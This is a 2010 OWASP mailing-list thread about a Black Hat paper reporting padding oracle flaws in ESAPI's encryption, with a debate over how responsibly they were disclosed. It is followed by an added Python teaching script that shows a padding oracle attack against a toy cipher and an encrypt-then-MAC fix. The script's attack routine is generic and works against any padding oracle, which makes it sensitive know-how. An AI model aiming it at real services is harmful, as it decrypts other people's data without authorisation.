[Esapi-user] [Owasp-leaders] Crypto attack and OWASP

Jeff Williams jeff.williams at owasp.org
Sun May 2 16:55:12 EDT 2010

IMHO this is just one more sign of a healthy security ecosystem. There will always be folks who think it's 37337 to release an unknown exploit regardless of the harm it causes. But complaining about it won't help.  No matter what, we need to have a measured response capability ready. It's entirely possible that this is an esoteric risk that doesn't really expose any real applications, however it could also be critical. At this point we don't know. I'm looking forward to evaluating the alleged flaw, whatever it might be.


-----Original Message-----
From: owasp-leaders-bounces at lists.owasp.org [mailto:owasp-leaders-bounces at lists.owasp.org] On Behalf Of Jim Manico
Sent: Sunday, May 02, 2010 1:30 PM
To: owasp-leaders at lists.owasp.org; ESAPI-Developers; ESAPI-Users
Subject: Re: [Owasp-leaders] Crypto attack and OWASP

We deprecated 1.4 encryption and are seeking bids for professional cryptographic-centric review of ESAPI 2.0 rc6 before we promote ESAPI to GA (general availability). I have stated on several occasions that no one should be using ESAPI for cryptographic storage in production apps - yet.

However, I do have an issue with the irresponsible nature of this

 >  We leave the finding of these bugs as an exercise for readers

And I know that members of OWASP would NEVER pull a stunt like this to any vendor. Our ethics put community and open way above glory-seeking,

Jim Manico

On May 2, 2010, at 1:50 AM, Christian Heinrich <christian.heinrich at owasp.org> wrote:

> Nam,
>
> To quote https://media.blackhat.com/bh-eu-10/whitepapers/Duong_Rizzo/BlackHat-EU-2010-Duong-Rizzo-Padding-Oracle-wp.pdf
>
> "5.3.2 OWASP ESAPI
> OWASP ESAPI [20], which stands for OWASP Enterprise Security API
> Toolkits, is a project that claims to “help software developers guard
> against security-related design and implementation flaws.” However, we
> found that all OWASP ESAPI for Java up to version 2.0 RC2 are
> vulnerable to Padding Oracle attacks [21]. There were some significant
> changes in ESAPI Encryption API since 2.0 RC3 [22]. Unfortunately, while
> these changes are heading in the correct direction, i.e. signing
> the ciphertext or using an authenticated encryption mode, at the
> time of this writing there are still some bugs in the latest
> implementation [23] that make applications using ESAPI for Java still
> vulnerable to Padding Oracle attacks."
> On Fri, Mar 5, 2010 at 12:15 PM, Nam Nguyen <namn at bluemoon.com.vn> wrote:
>> Quote: We show that even OWASP folks can't get it right, how can an  
>> average Joe survive this new class of vulnerabilities?
>> http://www.blackhat.com/html/bh-eu-10/bh-eu-10-briefings.html#Duong
>> Anyone going to BH-EU?
> --
> Regards,
> Christian Heinrich - http://www.owasp.org/index.php/user:cmlh
> OWASP "Google Hacking" Project Lead - http://sn.im/owasp_google_hacking
> _______________________________________________
> OWASP-Leaders mailing list
> OWASP-Leaders at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-leaders
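The vulnerability class the quoted paper describes, and the remedy it names (authenticating the ciphertext before any decryption), worked through as an added example. This is not code from the thread, from the paper, or from ESAPI, and it does not reproduce the specific ESAPI bugs, which the paper does not detail. The block cipher is a toy Feistel construction built from HMAC so the script runs offline with only the standard library; it stands in for AES and is not a real cipher, and the attack does not care which cipher is underneath. The secret plaintext, keys and the `oracle(ct) -> bool` interface are constructed for the demo.

```python
"""Padding oracle against CBC/PKCS#7, and encrypt-then-MAC closing it.  Added
example for this thread, not ESAPI code.  The block cipher is a toy Feistel
construction so the demo runs offline; the attack itself is cipher-agnostic."""
import hashlib, hmac, os

BLOCK, MAC_LEN = 16, 32
SECRET = b"ESAPI thread: the attacker never sees the key"  # constructed sample
class PaddingError(Exception): pass
class AuthError(Exception): pass

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))
def _round(key, rnd, half):           # toy round function, NOT a real cipher
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def toy_block_encrypt(key, block):    # 8-round balanced Feistel on 16 bytes
    l, r = block[:8], block[8:]
    for rnd in range(8):
        l, r = r, _xor(l, _round(key, rnd, r))
    return l + r

def toy_block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(8)):
        l, r = _xor(r, _round(key, rnd, l)), l
    return l + r

def unpad(data):                      # PKCS#7 check; raising here is the oracle
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise PaddingError("bad padding")
    return data[:-n]

def cbc_encrypt(key, pt):
    n = BLOCK - len(pt) % BLOCK        # PKCS#7: n bytes of value n
    padded, prev = pt + bytes([n]) * n, os.urandom(BLOCK)  # random IV = block 0
    out = [prev]
    for i in range(0, len(padded), BLOCK):
        prev = toy_block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt_leaky(key, ct):
    # Vulnerable: unauthenticated CBC whose padding failure is observable.
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return unpad(b"".join(_xor(toy_block_decrypt(key, c), p)
                          for p, c in zip(blocks, blocks[1:])))

def recover_block(oracle, prev, target):
    """One block from the oracle alone; oracle(ct) is True iff padding is valid."""
    inter = bytearray(BLOCK)           # D(target), learned right to left
    for pos in range(BLOCK - 1, -1, -1):
        pad_val = BLOCK - pos
        suffix = bytes(inter[j] ^ pad_val for j in range(pos + 1, BLOCK))
        for guess in range(256):
            forged = bytes(pos) + bytes([guess]) + suffix
            if not oracle(forged + target):
                continue
            if pos == BLOCK - 1:       # accepted as 0x01, or a lucky 0x02 0x02?
                alt = bytes(pos - 1) + bytes([1, guess])
                if not oracle(alt + target):
                    continue           # byte 14 mattered, so it was not 0x01
            inter[pos] = guess ^ pad_val
            break
        else:
            raise RuntimeError("oracle never accepted position %d" % pos)
    return _xor(inter, prev)

def padding_oracle_attack(oracle, ct):
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return unpad(b"".join(recover_block(oracle, p, c) for p, c in zip(blocks, blocks[1:])))

def etm_encrypt(enc_key, mac_key, pt):
    ct = cbc_encrypt(enc_key, pt)      # encrypt-then-MAC over IV || ciphertext
    return ct + hmac.new(mac_key, ct, hashlib.sha256).digest()
def etm_decrypt(enc_key, mac_key, data):
    ct, tag = data[:-MAC_LEN], data[-MAC_LEN:]
    if not hmac.compare_digest(hmac.new(mac_key, ct, hashlib.sha256).digest(), tag):
        raise AuthError("rejected")    # MAC checked before padding is ever inspected
    return cbc_decrypt_leaky(enc_key, ct)  # padding is now only examined on authentic data

def oracle_from(decrypt_fn, error):
    def oracle(c):
        try:
            decrypt_fn(c)
            return True
        except error:
            return False
    return oracle

def demo():
    enc_key, mac_key = os.urandom(32), os.urandom(32)
    leaky = oracle_from(lambda c: cbc_decrypt_leaky(enc_key, c), PaddingError)
    authed = oracle_from(lambda c: etm_decrypt(enc_key, mac_key, c + bytes(MAC_LEN)), AuthError)
    recovered = padding_oracle_attack(leaky, cbc_encrypt(enc_key, SECRET))
    try:                               # attacker has no tag, so every query is rejected
        padding_oracle_attack(authed, etm_encrypt(enc_key, mac_key, SECRET)[:-MAC_LEN])
        return recovered, False
    except RuntimeError:
        return recovered, True
```

`demo()` returns the full plaintext recovered from the leaky decryptor without the key, together with a flag showing that the same attack against the encrypt-then-MAC variant never gets a single accepted query. The two details that matter in `etm_decrypt` are the order (verify the tag over IV and ciphertext before touching the padding) and the constant-time `hmac.compare_digest`; with the tag checked first, padding is only ever examined on ciphertext the key holder produced, so no padding-validity signal reaches an attacker. In production the same property comes from an AEAD mode such as AES-GCM or from a vetted CBC-plus-HMAC construction, not from a toy cipher like the one above.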
